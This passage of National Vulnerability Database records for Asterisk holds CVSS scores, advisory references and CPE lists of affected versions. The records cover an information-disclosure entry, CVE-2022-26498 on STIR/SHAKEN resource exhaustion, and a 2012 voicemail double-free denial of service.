    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-06-12T04:29:00.220",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2018-008.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/104455"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27818"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://security.gentoo.org/glsa/201811-11"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2018/dsa-4320"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2018-008.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/104455"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27818"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://security.gentoo.org/glsa/201811-11"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2018/dsa-4320"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2022-04-15 05:15

Modified

2024-11-21 06:54

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2.

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html	Patch, Third Party Advisory, VDB Entry
cve@mitre.org	http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html
cve@mitre.org	https://downloads.asterisk.org/pub/security/	Vendor Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2022-001.html	Patch, Vendor Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html	Mailing List, Third Party Advisory
cve@mitre.org	https://www.debian.org/security/2022/dsa-5285	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html	Patch, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2022-001.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2022/dsa-5285	Third Party Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
debian	debian_linux	10.0
debian	debian_linux	11.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D8AB56FA-AEC6-4A6F-B420-DDBF3390379B",
              "versionEndIncluding": "16.25.1",
              "versionStartIncluding": "16.15.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "496A20DA-23D7-435B-8EA9-3AC585DAAB72",
              "versionEndExcluding": "18.11.2",
              "versionStartIncluding": "18.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C25BFFCA-90FE-475D-88A7-3BC281B830AF",
              "versionEndIncluding": "19.3.1",
              "versionStartIncluding": "19.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
    },
    {
      "lang": "es",
      "value": "Se ha detectado un problema en Asterisk versiones hasta 19.x. Cuando es usado STIR/SHAKEN, es posible descargar archivos que no son certificados. Estos archivos pod\u00edan ser mucho m\u00e1s grandes de lo que se esperaba descargar, conllevando a un agotamiento de recursos. Esto ha sido corregido en versiones 16.25.2, 18.11.2 y 19.3.2"
    }
  ],
  "id": "CVE-2022-26498",
  "lastModified": "2024-11-21T06:54:03.827",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2022-04-15T05:15:06.597",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2022/dsa-5285"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2022/dsa-5285"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-400"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2012-07-09 22:55

Modified

2024-11-21 01:41

Severity ?

Summary

Double free vulnerability in apps/app_voicemail.c in Asterisk Open Source 1.8.x before 1.8.13.1 and 10.x before 10.5.2, Certified Asterisk 1.8.11-certx before 1.8.11-cert4, and Asterisk Digiumphones 10.x.x-digiumphones before 10.5.2-digiumphones allows remote authenticated users to cause a denial of service (daemon crash) by establishing multiple voicemail sessions and accessing both the Urgent mailbox and the INBOX mailbox.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2012-011.html	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/50687
cve@mitre.org	http://secunia.com/advisories/50756
cve@mitre.org	http://www.debian.org/security/2012/dsa-2550
cve@mitre.org	http://www.securityfocus.com/bid/54317
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-20052
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2012-011.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/50687
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/50756
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2012/dsa-2550
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/54317
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-20052

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.1
digium	asterisk	1.8.8.2
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.2
digium	asterisk	1.8.9.3
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.1
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asteriske	1.8.8.0
digium	asteriske	1.8.9.1
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.1
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.1
digium	asterisk	10.1.2
digium	asterisk	10.1.3
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.1
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.1
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.1
digium	asterisk	10.4.2
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.1
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA60A9C9-C2EF-4971-BEFB-FF687DAEF2F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BAFB22FA-CC24-4AFE-AC83-2D044563F7CE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "00F3EB0D-7C63-46B5-BA95-8486B9716C78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "00C1BF3B-7593-478D-9AAA-153901C70286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F86406A-0936-4A06-88FB-4137A64498EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "672CE4C0-EBD6-470B-937E-810FF1C4CDBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88DB1105-74D8-4312-9D02-D1E21F2E785C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "404C0557-6229-4D90-BFDD-54AFFCCE6A19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6D1D26CC-891F-4396-B7D7-30D712829E71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B61EA-F4D1-452A-9D96-B8DFDD719B0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9324AB96-EC99-4F04-A0A9-00F936C86EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB6BBCA-47CE-49B8-9706-AFDE4BE46550",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "8BFF65E2-692B-4C39-88FC-6DED8D9A7258",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E8AE686-B618-4B0D-BD27-1F96295E964D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E9751C0A-84F5-4A43-8282-12A9DE559569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F67E2694-F6F1-482C-91F2-D9FD856EA31B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E2D53AA-8D50-445F-9500-2F580F260DC0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8880AE7C-3E44-4B76-B500-E93868D4CF5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7C94269D-A271-42AC-A44C-102C814E564B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E7E5B826-D3D5-4D2D-BB4D-2C1BEDE92456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asteriske:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "5B9023E8-DB6F-4DE2-BB1E-D941BE279477",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asteriske:1.8.9.1:*:*:*:*:*:*:*",
